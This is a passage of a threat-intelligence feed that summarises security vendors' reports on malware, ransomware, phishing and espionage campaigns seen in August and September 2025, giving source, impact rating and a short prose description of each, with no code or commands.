Researchers at ESET have identified a PowerShell malware sample attributed to the North Korean threat actor Kimsuky, deployed in July 2025 against a South Korean non-profit organization engaged in diplomatic and foreign affairs. The script, Diplomatic Plaza.ps1, collects host data including running processes, OS version, public IP address, and antivirus product details, then exfiltrates this information to Dropbox using stolen tokens. It further downloads secondary payloads from both Dropbox and attacker-controlled infrastructure, achieving persistence through scheduled tasks and hidden cmd.exe execution. The campaign reflects espionage intent, with Dropbox API abuse providing stealth against traditional detection methods and chained persistence enabling long-term access.
Source: https://wezard4u.tistory.com/429586
2025-09-06
IPTV_Piracy_Large_Scale_Hosting_Network
MEDIUM
Intel Source:
Silent Push
Intel Name:
IPTV_Piracy_Large_Scale_Hosting_Network
Date of Scan:
2025-09-06
Impact:
MEDIUM
Summary:
Researchers at Silent Push have identified a massive IPTV piracy network leveraging more than 1,100 domains and 10,000 IP addresses. The infrastructure has been operating for years and serves pirated content from over 20 major brands, including sports broadcasters and streaming services. Two commercial entities, XuiOne and Tiyansoft, were linked to profiting from the distribution of this unlicensed content. The investigation further tied at least one individual, Nabi Neamati of Herat, Afghanistan, to operational control of the network, including web hosting and software setup. Multiple domains such as xuione.com, jvtvlive.xyz, streamxpert.net, and tiyansoft.com were clustered under common dedicated IPs, showing a coordinated backend infrastructure.
Source: https://www.silentpush.com/blog/iptv-piracy/?utm_source=rss&utm_medium=rss&utm_campaign=iptv-piracy
2025-09-06
Stealerium_and_Phantom_Infostealer_Surge
HIGH
Intel Source:
Proofpoint
Intel Name:
Stealerium_and_Phantom_Infostealer_Surge
Date of Scan:
2025-09-06
Impact:
HIGH
Summary:
Researchers at Proofpoint have observed a resurgence in campaigns leveraging Stealerium, an open-source infostealer first released on GitHub in 2022, and its derivatives including Phantom Stealer and Warp Stealer. Activity spiked between May and July 2025, with campaigns linked to threat actors TA2715 and TA2536, marking the first large-scale use of Stealerium since early 2023. Delivery relied on phishing emails impersonating trusted entities such as banks, charities, travel agencies, and courts, distributing payloads via compressed executables, JavaScript, VBScript, ISO, IMG, and ACE archives, with themes including payment requests, legal summons, bookings, and adult content. Once executed, Stealerium collects Wi-Fi credentials using netsh wlan, modifies Windows Defender exclusions, and persists via scheduled tasks while stealing data ranging from browser cookies, credit card data, and VPN credentials to crypto wallets, emails, and chat sessions.
Source: https://www.proofpoint.com/us/blog/threat-insight/not-safe-work-tracking-and-investigating-stealerium-and-phantom-infostealers
2025-09-05
XWorm_Backdoor_Campaign
MEDIUM
Intel Source:
Trellix
Intel Name:
XWorm_Backdoor_Campaign
Date of Scan:
2025-09-05
Impact:
MEDIUM
Summary:
Researchers at Trellix have uncovered an advanced variant of XWorm, a .NET-based RAT distributed through weaponized .lnk shortcut files that initiate a multi-stage infection chain, ultimately installing a packed backdoor on Windows systems. The malware leverages an embedded PowerShell script to download a disguised loader, which then installs additional payloads to gain higher privileges and establish persistence. Once installed, XWorm disables Windows Firewall, creates scheduled tasks, and modifies registry keys to ensure it survives system reboots. It also employs techniques such as heavy packing, virtual machine checks, and string obfuscation to evade detection. The decrypted C2 logic reveals a wide range of backdoor capabilities, including downloading and exfiltrating files, redirecting URLs, shutting down systems, and launching DDoS attacks.
Source: https://www.trellix.com/blogs/research/xworms-evolving-infection-chain-from-predictable-to-deceptive/
2025-09-05
Obscura_Ransomware
HIGH
Intel Source:
Huntress
Intel Name:
Obscura_Ransomware
Date of Scan:
2025-09-05
Impact:
HIGH
Summary:
Researchers at Huntress have discovered a new ransomware variant called Obscura, designed to spread rapidly within Windows networks. It was first observed executing on domain controllers, enabling it to move swiftly across an organization’s Active Directory. The ransomware copies itself through the SYSVOL share and creates scheduled tasks to launch encryption on multiple machines at the same time. Prior to encrypting files, it checks for admin rights, terminates security and backup processes, and deletes shadow copies to prevent recovery. It employs strong encryption (XChaCha20 with Curve25519) and leaves a ransom note demanding payment within 24 hours. The malware has different modes of operation for standalone PCs, domain members, and domain controllers. Once deployed, it causes massive data loss and downtime, since every system it reaches gets encrypted.
Source: https://www.huntress.com/blog/obscura-ransomware-variant
2025-09-04
Google_Salesforce_Breach
HIGH
Intel Source:
Seqrite
Intel Name:
Google_Salesforce_Breach
Date of Scan:
2025-09-04
Impact:
HIGH
Summary:
Researchers from Seqrite have identified that two groups known as UNC6040 and UNC6240, linked to the ShinyHunters collective known as “The Com”, breached Google’s Salesforce system. The attackers leveraged voice phishing to trick Google support staff into approving a malicious OAuth 2.0 application, which granted them immediate access to high-privilege API tokens without needing passwords. They then used custom Python scripts that mimic Salesforce DataLoader to exfiltrate large amounts of customer data belonging to Google’s small- and medium-sized business clients. The stolen information included names, phone numbers, and email addresses but not Google account passwords. The attackers routed the stolen data through Mullvad VPN servers and TOR exit nodes and subsequently issued a Bitcoin extortion demand. Although Google successfully contained the breach, the stolen data still poses significant risks such as phishing, credential theft, and compliance issues for affected customers.
Source: https://www.seqrite.com/blog/google-salesforce-breach-unc6040-threat-research/
2025-09-04
MintsLoader_Resumed_PEC_Phishing_Campaign
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
MintsLoader_Resumed_PEC_Phishing_Campaign
Date of Scan:
2025-09-04
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have observed a resurgence of the MintsLoader malware campaign following a summer pause, marking the first wave since June 2025. The campaign continues exploiting certified email (PEC) channels by sending malicious messages from compromised PEC accounts to other PEC recipients, leveraging the trust of this channel to increase delivery success. In this iteration, attackers shifted from hyperlink-based lures to ZIP attachments containing obfuscated JavaScript loaders that initiate the compromise chain. Once executed on Windows 10 and later systems, the loader abuses the built-in cURL utility to download and install infostealer malware, enabling credential theft and sensitive data exfiltration.
Source: https://cert-agid.gov.it/news/riprende-la-campagna-mintsloader/
2025-09-03
DireWolf_Ransomware_Targets_Multiple_Organisations
HIGH
Intel Source:
ASEC
Intel Name:
DireWolf_Ransomware_Targets_Multiple_Organisations
Date of Scan:
2025-09-03
Impact:
HIGH
Summary:
ASEC researchers have uncovered a ransomware group called DireWolf that first emerged in May 2025 with the launch of its darknet leak site. The group is financially motivated and operates a double-extortion model that combines file encryption with the threat of publishing stolen data to pressure victims into paying ransoms. The ransomware is designed to target Windows systems and employs a parallelized worker pool to accelerate encryption with Curve25519 and the ChaCha20 cipher. It deletes Windows event logs, removes shadow copies, disables the Windows Recovery Environment, and terminates backup, database, and security processes such as Veeam, MSSQL, and Exchange. Victim organisations disclosed so far include manufacturing, IT, construction, and finance sectors across Asia-Pacific, North America, and Europe, indicating opportunistic targeting rather than a focus on a specific sector. The attackers communicate with victims via a Tox messenger ID, enabling anonymous ransom negotiations.
Source: https://asec.ahnlab.com/ko/89938/
2025-09-03
Lazarus_Targets_DeFi_with_Layered_RAT_Campaign
HIGH
Intel Source:
FOX IT
Intel Name:
Lazarus_Targets_DeFi_with_Layered_RAT_Campaign
Date of Scan:
2025-09-03
Impact:
HIGH
Summary:
Researchers at Fox-IT have observed a financially motivated Lazarus subgroup conducting a sophisticated attack against a decentralized finance (DeFi) organization using layered remote-access tooling. The threat actor initiated contact via Telegram, impersonating legitimate trading-firm employees to lure a victim into a browser session that likely exploited a zero-day vulnerability for code execution. Persistence was established through phantom DLL loading and privilege escalation to SYSTEM, allowing the hijacking of built-in Windows services and kernel-level tampering to suppress endpoint telemetry. The group deployed three distinct RATs in sequence: PondRAT for initial file and process control, ThemeForestRAT for in-memory post-exploitation, and RemotePE for long-term access. Additional tools enabled capabilities such as screenshot capture, keylogging, credential dumping, and tunneling, supporting broad data collection and lateral movement. The campaign focused on harvesting sensitive financial data and maintaining persistent access to high-value systems while employing custom encryption and rootkit techniques for stealth. Cross-platform malware variants targeting Windows, Linux, and macOS further demonstrated the actor’s technical versatility.
Source: https://blog.fox-it.com/2025/09/01/three-lazarus-rats-coming-for-your-cheese/
2025-09-03
Inf0s3c_Stealer_Python_Based_Info_Grabber
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Inf0s3c_Stealer_Python_Based_Info_Grabber
Date of Scan:
2025-09-03
Impact:
MEDIUM
Summary:
Researchers at CYFIRMA have identified Inf0s3c Stealer, a UPX-compressed, PyInstaller-packed Python executable designed to harvest host information and exfiltrate it via Discord. The stealer enumerates system details, running processes, and user-directory trees, then captures screenshots and optional webcam images. It siphons browser credentials, Discord and Telegram tokens, cryptocurrency wallets, Wi-Fi keys, and gaming-platform cookies. Collected artefacts are staged in a temporary workspace, compressed into a password-protected RAR archive, and automatically transmitted to an attacker-controlled channel. Persistence is achieved by copying itself to the Startup folder and attempting a UAC bypass, while anti-VM checks and code packing hinder analysis.
Source: https://www.cyfirma.com/research/unveiling-a-python-stealer-inf0s3c-stealer/
2025-09-03
APT36_Sindoor_Dropper_Linux_Dot_desktop_Phishing_Campaign
MEDIUM
Intel Source:
Nextron Systems
Intel Name:
APT36_Sindoor_Dropper_Linux_Dot_desktop_Phishing_Campaign
Date of Scan:
2025-09-03
Impact:
MEDIUM
Summary:
Researchers at Nextron Systems have observed a spear-phishing campaign dubbed “Sindoor Dropper” that targets desktop Linux users. The operation is attributed with moderate confidence to APT36 (Transparent Tribe). Attackers deliver weaponised .desktop files masquerading as PDFs that execute without privilege escalation, granting initial access. A multistage loader chain restores stripped ELF headers, decrypts payloads with DES-CBC and Base64 layers, and employs anti-analysis checks for virtual machines, strings, and system uptime. The final stage drops a legitimate MeshAgent binary that establishes a WebSocket C2 channel to attacker infrastructure on AWS, providing full interactive control, file transfer, and screen capture. This access enables data exfiltration and manual lateral movement across victim networks.
Source: https://www.nextron-systems.com/2025/08/29/sindoor-dropper-new-phishing-campaign/
2025-09-03
Lumma_Stealer_Credential_Theft_Malware_Targets_Windows
MEDIUM
Intel Source:
Any.Run
Intel Name:
Lumma_Stealer_Credential_Theft_Malware_Targets_Windows
Date of Scan:
2025-09-03
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have observed Lumma Stealer, a commodity Windows infostealer that siphons browser credentials, cookies, and host inventory data from compromised endpoints. The malware is delivered mainly through phishing emails that drop a loader; once launched, the chain proceeds with privilege-escalation attempts and durable persistence mechanisms. ANY.RUN’s interactive sandbox recorded staged payload downloads and C2 beacons, mapping the full attack sequence in under 30 seconds. Lumma’s operators appear financially motivated, seeking to monetize stolen credentials via direct fraud or resale on criminal markets.
Source: https://any.run/cybersecurity-blog/streamline-your-soc/
2025-09-02
VShell_Filename_triggered_Linux_Memory_Resident_Backdoor
MEDIUM
Intel Source:
Polyswarm
Intel Name:
VShell_Filename_triggered_Linux_Memory_Resident_Backdoor
Date of Scan:
2025-09-02
Impact:
MEDIUM
Summary:
Researchers at PolySwarm have observed VShell, a custom Go backdoor delivered through a novel filename-based command-injection chain that targets Linux hosts. The attack begins with a spam email containing a RAR archive whose crafted filename embeds a Base64-encoded Bash script that executes automatically when common shell utilities process the listing. This first-stage code downloads an architecture-specific ELF loader that launches the final payload wholly in memory via fexecve(). Once resident, VShell masquerades as a kernel thread and communicates with hard-coded C2 servers using XOR-encrypted traffic. The implant offers interactive reverse shell, file transfer, process control and TCP/UDP tunneling, providing full post-exploitation capability.
Source: https://blog.polyswarm.io/vshell-linux-backdoor
2025-09-02
AI_Waifu_RAT_LLM_enabled_backdoor_for_remote_code_execution
MEDIUM
Intel Source:
writeups.ryingo
Intel Name:
AI_Waifu_RAT_LLM_enabled_backdoor_for_remote_code_execution
Date of Scan:
2025-09-02
Impact:
MEDIUM
Summary:
Researchers at writeups.ryingo have observed AI Waifu RAT compromising hobbyist Windows users by masquerading as a “Win11 Waifu” enhancement. The malware’s author markets arbitrary code execution as a desirable feature, persuading victims to disable security controls and run unsigned binaries. Static and dynamic analysis shows the agent opens a fixed localhost HTTP service that executes attacker-supplied PowerShell commands, reads arbitrary files, and returns results to an LLM-mediated channel. Traffic is cleartext and unauthenticated, enabling silent attacker control and payload updates. A companion “CTF challenge” binary requests administrator rights and achieves persistence via Run-key registry writes, underscoring deliberate malicious intent. Observed capabilities include remote code execution, data theft, and delivery of secondary payloads, elevating risk despite limited sophistication.
Source: https://ryingo.gitbook.io/writeups-ai_waifu_rat
2025-09-01
APT29_Watering_Hole_Campaign
MEDIUM
Intel Source:
AWS Blog
Intel Name:
APT29_Watering_Hole_Campaign
Date of Scan:
2025-09-01
Impact:
MEDIUM
Summary:
Amazon researchers have observed that the Russia-linked threat group APT29, also known as Midnight Blizzard, compromised multiple legitimate websites by injecting malicious JavaScript designed to secretly redirect visitors to attacker-controlled domains impersonating Cloudflare verification pages. The objective was to deceive users into approving Microsoft device code authentication requests, allowing the attackers to steal access tokens for Microsoft 365 and other cloud resources. The campaign leveraged randomized redirects, base64-encoded scripts, and cookies to evade detection and avoid repeated exposure. According to the researchers, no AWS customer data was compromised, but if successful, the attack could have enabled large-scale cloud and email intrusions, credential theft, and intelligence collection.
Source: https://aws.amazon.com/blogs/security/amazon-disrupts-watering-hole-campaign-by-russias-apt29/
2025-09-01
MetaStealer_Fake_AnyDesk_Installer_Leads_to_Infostealer
MEDIUM
Intel Source:
Huntress
Intel Name:
MetaStealer_Fake_AnyDesk_Installer_Leads_to_Infostealer
Date of Scan:
2025-09-01
Impact:
MEDIUM
Summary:
Researchers at Huntress have observed a social-engineering campaign that impersonates the AnyDesk remote-access tool to deliver the MetaStealer infostealer. The lure starts with a bogus Cloudflare Turnstile CAPTCHA that pressures users to “verify” themselves, then abuses the search-ms URI handler to open Windows File Explorer to an attacker-controlled SMB share. A Windows LNK file, disguised as Readme Anydesk.pdf, downloads a legitimate AnyDesk installer to reduce suspicion while silently fetching and running an MSI package that drops MetaStealer. The stealer harvests credentials, crypto-wallet data and arbitrary files, exfiltrating them to command-and-control infrastructure.
Source: https://www.huntress.com/blog/fake-anydesk-clickfix-metastealer-malware
2025-09-01
Multiple_Threat_Actors_AI_Website_Builder_Fuels_Phishing
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Multiple_Threat_Actors_AI_Website_Builder_Fuels_Phishing
Date of Scan:
2025-09-01
Impact:
MEDIUM
Summary:
Proofpoint researchers have observed a surge of credential-phishing, malware and fraud campaigns that abuse the free “Lovable” AI website-generation platform. Threat actors use Lovable to spin up convincing brand-impersonation sites (e.g., Microsoft, UPS, Aave) that harvest passwords, MFA tokens, credit-card details and even cryptocurrency wallets. The same infrastructure also delivers payloads such as zgRAT via sideloading techniques. Campaign telemetry shows tens of thousands of malicious Lovable URLs each month, reaching more than 5,000 organizations across typical corporate email, SMS and web channels.
Source: https://www.proofpoint.com/us/blog/threat-insight/cybercriminals-abuse-ai-website-creation-app-phishing
2025-08-31
JSCoreRunner_Browser_hijacking_malware_via_fake_PDF_tool
MEDIUM
Intel Source:
Mosyle
Intel Name:
JSCoreRunner_Browser_hijacking_malware_via_fake_PDF_tool
Date of Scan:
2025-08-31
Impact:
MEDIUM
Summary:
Researchers at Mosyle have identified JSCoreRunner, a previously unknown macOS threat that masquerades as a free PDF-conversion utility before executing an unsigned second-stage installer that bypasses Gatekeeper. The two-stage chain rewrites Google Chrome profile settings to funnel searches through a fraudulent engine, suppressing crash logs to remain covert. This grants the operator persistent visibility into victims’ web activity and positions them to harvest credentials or redirect users to phishing pages. The first installer is signed with a now-revoked certificate, while the second is completely unsigned, highlighting deliberate evasion of Apple notarization checks. At discovery, the sample had zero detections on VirusTotal, underscoring its novelty and the limitations of signature-based defenses. Victimology is currently limited to macOS users who seek third-party file converters, but any unmanaged endpoint could be at risk.
Source: https://9to5mac.com/2025/08/27/mosyle-identifies-new-mac-malware-that-evades-detection-through-fake-pdf-conversion-tool/
2025-08-31
Interlock_AES_256_GCM_Ransomware_Targeting_Businesses
HIGH
Intel Source:
ASEC
Intel Name:
Interlock_AES_256_GCM_Ransomware_Targeting_Businesses
Date of Scan:
2025-08-31
Impact:
HIGH
Summary:
Researchers at AhnLab Security Emergency response Center (ASEC) have identified “Interlock,” a ransomware operation that surfaced in September 2024 and is now conducting continuous double-extortion attacks against companies and critical infrastructure operators across North America and Europe. The group’s malware leverages OpenSSL to combine AES-256-GCM file encryption with RSA-4096 key wrapping, leaving victims unable to decrypt data locally once the symmetric key and IV are sealed in each file trailer. At run-time, the payload decrypts itself in memory, patches code on the fly, and deletes traces to evade signature-based and memory scanners. Command-line switches enable full-drive encryption, single-file targeting, forced process termination, and Task Scheduler abuse for privilege escalation, underscoring operational flexibility.
Source: https://asec.ahnlab.com/en/89912/
2025-08-31
TinkyWinkey_Keylogger_Stealth_Windows_credential_capture
MEDIUM
Intel Source:
Cyfirma
Intel Name:
TinkyWinkey_Keylogger_Stealth_Windows_credential_capture
Date of Scan:
2025-08-31
Impact:
MEDIUM
Summary:
Researchers at CYFIRMA have observed the emergence of TinkyWinkey, a Windows-focused keylogger that achieves persistence by installing its loader as a system service and then injecting its payload into explorer.exe. The malware sets a low-level keyboard hook to record every keystroke and tags entries with active window titles and keyboard-layout changes, maximising credential-harvesting accuracy. On launch, it profiles the host (CPU, RAM, OS build, local IP) to aid follow-on operations. Logged data are written to an obfuscated file in the user’s temporary directory and staged locally for exfiltration. Because TinkyWinkey operates without outbound command-and-control traffic, network monitoring alone is unlikely to reveal its presence. No built-in propagation or lateral-movement mechanisms were documented, indicating operators rely on other access vectors to deploy the tool.
Source: https://www.cyfirma.com/research/tinkywinkey-keylogger/
2025-08-31
EncryptHub_Teams_Phishing_Delivers_PowerShell_Loader
HIGH
Intel Source:
Permiso
Intel Name:
EncryptHub_Teams_Phishing_Delivers_PowerShell_Loader
Date of Scan:
2025-08-31
Impact:
HIGH
Summary:
Researchers at Permiso have identified a financially motivated threat group dubbed EncryptHub (a.k.a. LARVA-208/Water Gamayun) abusing Microsoft Teams direct messages for initial access. The actors establish or hijack Microsoft 365 tenants and pose as “IT Support” to trick employees into accepting external chats. Social-engineering lures prompt victims to launch built-in remote-assist utilities such as QuickAssist or to install AnyDesk, granting attackers real-time keyboard access. With control of the workstation, they deploy a multi-stage PowerShell loader that bypasses execution policy, harvests credentials and system data, and opens an AES-encrypted command channel. The loader marks its own process as critical, causing a blue screen if defenders terminate it, and persists via scheduled tasks or registry Run keys. Follow-on payloads observed include DarkGate and Matanbuchus, malware families frequently linked to ransomware operators. Victims include IT administrators, developers and Web3 personnel in English-speaking organisations, indicating a focus on users with elevated access.
Source: https://permiso.io/blog/sliding-into-your-dms-abusing-microsoft-teams-for-malware-delivery?hs_preview=VYVYybGX-195188659586
2025-08-31
NightSpire_Aggressive_Double_Extortion_Ransomware
MEDIUM
Intel Source:
ASEC
Intel Name:
NightSpire_Aggressive_Double_Extortion_Ransomware
Date of Scan:
2025-08-31
Impact:
MEDIUM
Summary:
Researchers at ASEC have observed NightSpire, a ransomware group active since February 2025, executing aggressive double-extortion campaigns. The actor runs a Dedicated Leak Site with countdown timers to pressure payment and uses highly threatening language in its ransom notes. NightSpire offers multiple negotiation channels—including ProtonMail, OnionMail and Telegram—signalling a service-oriented, mature infrastructure. Initial access is reportedly gained by exploiting corporate vulnerabilities, but no automated worm-like propagation has been documented. Victims already span retail, chemical manufacturing, maritime, accounting, construction, technology, business services and financial sectors across the US, Japan, Thailand, the UK, China, Poland, Hong Kong, Taiwan and South Korea.
Source: https://asec.ahnlab.com/en/89913/
2025-08-31
APT37_Operation_HanKook_Phantom_Spear_Phishing_Campaign
HIGH
Intel Source:
Seqrite
Intel Name:
APT37_Operation_HanKook_Phantom_Spear_Phishing_Campaign
Date of Scan:
2025-08-31
Impact:
HIGH
Summary:
Researchers at Seqrite Lab have identified a North Korean APT37 (ScarCruft/InkySquid) spear-phishing operation dubbed Operation HanKook Phantom. The campaign delivers Korean-language PDF decoys bundled with malicious LNK shortcuts that launch multi-stage, fileless PowerShell loaders to implant the custom ROKRAT backdoor. ROKRAT enumerates hosts, captures keystrokes and screens, exfiltrates local files and downloads follow-on payloads via encrypted traffic routed through legitimate cloud APIs (Dropbox, pCloud, Yandex Disk). Decoy content referencing Kim Yo-Jong statements and South-Korean policy documents indicates strategic intelligence collection on inter-Korean affairs. Victimology spans government ministries, universities and research institutes focused on security, energy and labour issues.
Source: https://www.seqrite.com/blog/operation-hankook-phantom-north-korean-apt37-targeting-south-korea/
2025-08-30
PromptLock_AI_driven_ransomware_PoC_with_Lua_scripts
MEDIUM
Intel Source:
ESET Research
Intel Name:
PromptLock_AI_driven_ransomware_PoC_with_Lua_scripts
Date of Scan:
2025-08-30
Impact:
MEDIUM
Summary:
Researchers at ESET have identified PromptLock, which they describe as the first known AI-powered ransomware. The malware is a Golang-written ransomware capable of file encryption and data exfiltration, with Windows and Linux variants seen uploaded to VirusTotal. Its core capability is on-host generation and execution of Lua scripts, produced on the fly by a locally run large language model accessed via the Ollama API, enabling automated reconnaissance and file selection prior to encryption. The report notes prompts are hard-coded to drive the model’s script generation, suggesting operator intent to modularize behavior and rapidly adapt tasks.
Source: https://www.welivesecurity.com/en/ransomware/first-known-ai-powered-ransomware-uncovered-eset-research/
2025-08-30
Lazarus_Group_Using_Clickfix_to_Deliver_Malware
MEDIUM
Intel Source:
Qi’anxin Threat Intelligence Center
Intel Name:
Lazarus_Group_Using_Clickfix_to_Deliver_Malware
Date of Scan:
2025-08-30
Impact:
MEDIUM
Summary:
Qi’anxin researchers have uncovered a new phishing campaign by the North Korean Lazarus group, known internally as APT-Q-1. This group has been active since 2007, targeting government agencies, financial institutions, cryptocurrency exchanges, and individuals across specific industries. In this campaign, Lazarus leverages a ClickFix tactic, where victims are lured with fake job postings and redirected to attacker-controlled interview websites. During the process, victims are informed their camera setup is faulty and are prompted to download an Nvidia software update that is in fact a malicious package. This package deploys the BeaverTail info-stealer through a Node.js environment, and on Windows 11 systems, also installs a backdoor named drvUpdate.exe enabling attackers to execute commands and read/write files. Additionally, the package installs the InvisibleFerret Python Trojan to establish persistence and facilitate data theft, using registry entries to maintain long-term access.
Source: https://www.ctfiot.com/267223.html
2025-08-30
UTG_0_I1000_Delivers_Silver_Fox_Trojan
MEDIUM
Intel Source:
Qi’anxin Threat Intelligence Center
Intel Name:
UTG_0_I1000_Delivers_Silver_Fox_Trojan
Date of Scan:
2025-08-30
Impact:
MEDIUM
Summary:
Researchers from Qi’anxin have identified a phishing campaign orchestrated by the UTG-0-I1000 Finance Group targeting corporate finance employees. The attackers send emails disguised as tax audits, subsidy notices, and other finance-related communications to trick recipients into opening malicious files. These files deliver the Silver Fox remote-control Trojan, enabling persistent access to the compromised system. Compromised machines are then used to spread QR-code phishing links that steal bank card details, login credentials and SMS codes, facilitating fraudulent fund transfers. The attackers use legitimate code-signing certificates, XOR-encrypted loaders, segmented infrastructure, and techniques that tamper with commercial monitoring tools to evade detection.
Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247515766&idx=1&sn=30a7d04ff2b61bfda9ac6d7c6c1070a5&poc_token=HD9ysGijQQJbgZkBL5Pp059HzXOQqtQtXuMuQVVN
2025-08-29
Underground_Ransomware_Targeted_Data_Theft_and_Encryption
MEDIUM
Intel Source:
ASEC
Intel Name:
Underground_Ransomware_Targeted_Data_Theft_and_Encryption
Date of Scan:
2025-08-29
Impact:
MEDIUM
Summary:
Researchers at AhnLab ASEC have observed Underground, a double-extortion ransomware crew that first surfaced in July 2023 and re-emerged in May 2024 with a branded leak site. The operation is currently striking organisations in the United Arab Emirates, United States, France, Spain, Australia, Germany, Slovakia, Taiwan, Singapore, Canada and South Korea across construction, interior design, manufacturing and IT sectors. The attackers gain interactive access, perform environment reconnaissance and compile a bespoke 64-bit Windows payload tailored for a single chosen host. When executed, the malware deletes Volume Shadow Copies, stops Microsoft SQL services and modifies Remote Desktop Protocol settings before encrypting recently accessed user files. Each file is locked with a unique AES key that is itself sealed with a hard-coded RSA public key, rendering host-based recovery infeasible.
Source: https://asec.ahnlab.com/en/89835/
2025-08-29
PRC_APT_Router_Level_Global_Espionage_Campaign
HIGH
Intel Source:
CISA
Intel Name:
PRC_APT_Router_Level_Global_Espionage_Campaign
Date of Scan:
2025-08-29
Impact:
HIGH
Summary:
Researchers at CISA have observed a cluster of People’s Republic of China (PRC) state-sponsored actors mapped by industry to Salt Typhoon, OPERATOR PANDA and UNC5807 exploiting network-edge devices worldwide since at least 2021. The actors exploit publicly known CVEs in Cisco IOS XE, Ivanti, Palo Alto PAN-OS and other platforms to gain root access. Their objective is long-term espionage, harvesting credentials and full-packet traffic from telecommunications, government, transportation, lodging and military networks. After initial access they establish covert GRE/IPsec tunnels, deploy custom Golang SFTP implants and abuse SNMP and TACACS+ to stage and exfiltrate data.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
2025-08-29
Velociraptor_Tool_Abuse_Remote_Access_and_Ransomware_Prep
MEDIUM
Intel Source:
Sophos
Intel Name:
Velociraptor_Tool_Abuse_Remote_Access_and_Ransomware_Prep
Date of Scan:
2025-08-29
Impact:
MEDIUM
Summary:
Researchers at Sophos have identified an intrusion in which an unidentified threat actor covertly installed the open-source Velociraptor incident-response framework on a Windows host to fetch and launch Visual Studio Code with the “tunnel” option enabled, thereby establishing interactive command-and-control. The attacker leveraged the native msiexec utility and an encoded PowerShell launcher to stage payloads from a Cloudflare Workers sub-domain, reducing detection by relying on legitimate software. Velociraptor was configured to beacon to a second Workers endpoint for persistence and tasking. Follow-on downloads of additional MSI packages indicate preparation for broader malware deployment. Investigators assess that the intrusion chain was a precursor to ransomware execution, halted only after an XDR alert prompted rapid host isolation. Abuse of a well-known DFIR tool for malicious access represents an evolution from earlier misuse of remote-management software, complicating defender trust models.
Source: https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
2025-08-29
Tycoon2FA_and_ClickFix_Phishing_Campaigns
MEDIUM
Intel Source:
Any.Run
Intel Name:
Tycoon2FA_and_ClickFix_Phishing_Campaigns
Date of Scan:
2025-08-29
Impact:
MEDIUM
Summary:
ANY.RUN researchers have identified several campaigns in the month of August 2025 that weaponize multi-stage phishing kits and social-engineering flows to defeat two-factor authentication. The first, dubbed Tycoon2FA, leverages a seven-step chain involving CAPTCHAs, press-and-hold gestures and email validation screens before presenting a spoofed Microsoft 365 portal to harvest credentials and one-time passwords. In parallel, a ClickFix flow leverages msiexec to silently install Rhadamanthys Stealer, which then downloads a PNG-embedded payload while evading detection through anti-VM checks and mismatched TLS certificates. The campaigns are targeting government, banking, insurance, telecom, manufacturing, healthcare, education, and logistics institutions across the US, UK, Canada, and Europe.
Source: https://any.run/cybersecurity-blog/cyber-attacks-august-2025/
2025-08-28
GodRAT_Malware
MEDIUM
Intel Source:
PolySwarm
Intel Name:
GodRAT_Malware
Date of Scan:
2025-08-28
Impact:
MEDIUM
Summary:
Researchers at PolySwarm have identified a new malware strain dubbed GodRAT, built on the old Gh0st RAT codebase, that primarily targets financial institutions, including trading and brokerage firms. The malware is distributed through malicious files disguised as financial documents and shared via Skype. GodRAT employs advanced evasion techniques, such as steganography to conceal shellcode within image files and the use of expired but legitimate digital certificates. Once executed, it injects malicious code into legitimate processes and retrieves configuration data from its C2 server. The RAT is capable of collecting extensive system information, harvesting browser credentials, downloading and executing additional payloads, and manipulating the file system. Additionally, the operators deploy AsyncRAT alongside dedicated password stealers to maintain persistence. Recent campaigns leveraging GodRAT have been observed across multiple regions, including Hong Kong, the United Arab Emirates, Lebanon, Malaysia, and Jordan.
Source: https://blog.polyswarm.io/godrat
2025-08-28
Cephalus_Ransomware
MEDIUM
Intel Source:
Huntress
Intel Name:
Cephalus_Ransomware
Date of Scan:
2025-08-28
Impact:
MEDIUM
Summary:
Huntress researchers have observed two incidents involving the Cephalus ransomware group, where attackers gained access to systems by compromising RDP accounts. After gaining access, they executed a legitimate SentinelOne binary to secretly load a malicious DLL containing the ransomware, effectively bypassing security controls. Before encrypting files, the attackers disabled Windows Defender’s real-time protection and deleted shadow backups to hinder recovery efforts. They also leveraged MEGA cloud storage to exfiltrate stolen data, indicating the use of a double-extortion model—stealing and encrypting data to pressure victims into paying. The campaign appears opportunistic in nature rather than targeting a specific industry sector.
Source: https://www.huntress.com/blog/cephalus-ransomware
2025-08-28
UpCrypter_Loader_Phishing_Campaign
MEDIUM
Intel Source:
Fortinet
Intel Name:
UpCrypter_Loader_Phishing_Campaign
Date of Scan:
2025-08-28
Impact:
MEDIUM
Summary:
FortiGuard researchers have identified a global phishing campaign that leverages the UpCrypter loader framework to deliver multiple RATs, including PureVNC, DCrat, and Babylon RAT. The attackers send tailored phishing emails that redirect victims to fake voicemail or purchase-order websites, hosting obfuscated JavaScript droppers. Once executed, these scripts download a compressed payload containing a .NET MSIL loader, which runs directly in memory and uses PowerShell to retrieve the final RAT. The UpCrypter framework adds registry run keys for persistence, performs anti-virtual machine and anti-debug checks to avoid analysis, and even hides C2 data inside JPEG images to evade detection. A successful compromise gives attackers full remote access to the victim’s system, enabling credential theft and establishing long-term control over Windows machines.
Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-companies-via-upcrypter
2025-08-27
PipeMagic_Backdoor_Evolution
MEDIUM
Intel Source:
Securelist
Intel Name:
PipeMagic_Backdoor_Evolution
Date of Scan:
2025-08-27
Impact:
MEDIUM
Summary:
Researchers at Securelist have identified a resurgence of the PipeMagic backdoor, showing clear evolution in both delivery and post-exploitation tactics since its first appearance in 2022. The campaign leverages a mix of loaders, including a trojanized ChatGPT desktop application, a C# Help Index file executed through msbuild, and DLL hijacking, all of which establish the same Windows-based backdoor tied to Azure-hosted infrastructure. Once deployed, the malware establishes encrypted local communications via named pipes, extends functionality through modular plugins, and uses a .NET injector to disable AMSI, ensuring persistence and evasion.
Source: https://securelist.com/pipemagic/117270/
2025-08-27
Salty2FA_PhaaS_Framework
MEDIUM
Intel Source:
Any.Run
Intel Name:
Salty2FA_PhaaS_Framework
Date of Scan:
2025-08-27
Impact:
MEDIUM
Summary:
